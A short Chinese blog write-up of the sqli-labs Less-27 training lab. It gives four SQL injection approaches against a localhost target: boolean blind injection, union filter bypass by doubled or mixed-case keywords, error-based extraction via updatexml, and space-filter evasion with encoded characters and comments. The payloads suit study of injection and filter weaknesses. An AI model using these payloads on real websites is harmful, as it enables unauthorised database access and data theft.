[sqli-labs]Less-27(Bool盲注 , 雙寫繞過 , 隨機大小寫繞過 , 報錯注入 , 特殊字符替換空格)

思路一 :

http://127.0.0.1/Less-27/?id=0%27||()||%271%27=%27--+
利用注入點盲注

思路二 : 參考資料

利用回顯明注 , 過濾了union , 可以通過雙寫來繞過 , 或者大小寫混寫來繞過
臥槽這個太屌了
http://127.0.0.1/Less-27/?id=0%27%a0UnION%a0SelECT(user()),2,3%27
%a0 是什么鬼
有待研究

思路三 :

利用報錯注入
http://127.0.0.1/Less-27/?id=0%27||(updatexml(1,concat(0x5e5e,version(),0x5e5e),1))||%271%27=%27--+

思路四 :

強行制造空格 , URL編碼 + 注釋
http://127.0.0.1/Less-28/?id=0/*%0a*/and/*%0a*/0--+
http://127.0.0.1/Less-27/?id=0%27/*%0a*/or/*%0a*/%27%27=%27
最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時請結(jié)合常識與多方信息審慎甄別。
平臺聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點,簡書系信息發(fā)布平臺,僅提供信息存儲服務。

相關(guān)閱讀更多精彩內(nèi)容

友情鏈接更多精彩內(nèi)容